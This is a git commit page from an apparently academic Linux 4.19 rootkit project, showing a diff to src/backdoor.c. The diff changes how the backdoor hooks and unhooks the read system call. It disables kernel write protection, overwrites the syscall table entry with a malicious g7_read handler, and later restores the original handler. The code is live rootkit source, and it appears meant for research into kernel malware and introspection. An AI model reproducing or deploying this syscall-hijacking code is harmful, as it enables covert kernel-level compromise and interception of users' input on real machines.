fixes read-backdoor unloading issue - linux-rootkit - Feature-rich interactive rootkit that targets Linux kernel 4.19, accompanied by a dynamic kernel memory analysis GDB plugin for in vivo introspection (e.g. using QEMU)

commit ab51a89125ebad2454b244bbabda8cc5f6ccc264
parent 1566bd56d0414a98e647b6bd8ebf43d7c2c9ee7d
Author: deurzen <m.deurzen@tum.de>
Date:   Sun,  6 Dec 2020 15:31:51 +0100

fixes read-backdoor unloading issue

Diffstat:
M src/backdoor.c  | 24 ++++++++++--------------

1 file changed, 10 insertions(+), 14 deletions(-)
diff --git a/src/backdoor.c b/src/backdoor.c
@@ -14,11 +14,9 @@ ssize_t (*current_tty_read)(struct file *, char *, size_t, loff_t *);
 void
 backdoor_read(void)
 {
-    if (atomic_inc_return(&read_install_count) == 1) {
-        disable_protection();
-        sys_calls[__NR_read] = (void *)g7_read;
-        enable_protection();
-    }
+    disable_protection();
+    sys_calls[__NR_read] = (void *)g7_read;
+    enable_protection();
 }
 
 void
@@ -61,15 +59,13 @@ unbackdoor(void)
 
         current_tty_read = NULL;
     } else if (sys_read) {
-        if (atomic_dec_return(&read_install_count) < 1) {
-            disable_protection();
-            sys_calls[__NR_read] = (void *)sys_read;
-            enable_protection();
+        disable_protection();
+        sys_calls[__NR_read] = (void *)sys_read;
+        enable_protection();
 
-            // Sleeping here is very important, as without it
-            // we would stall the CPU...
-            while ((cur = atomic_read(&read_count)) > 0)
-                msleep(250);
-        }
+        // Sleeping here is very important, as without it
+        // we would stall the CPU...
+        while ((cur = atomic_read(&read_count)) > 0)
+            msleep(250);
     }
 }

	linux-rootkit Feature-rich interactive rootkit that targets Linux kernel 4.19, accompanied by a dynamic kernel memory analysis GDB plugin for in vivo introspection (e.g. using QEMU)
	git clone git://git.deurzen.net/linux-rootkit
	Log \| Files \| Refs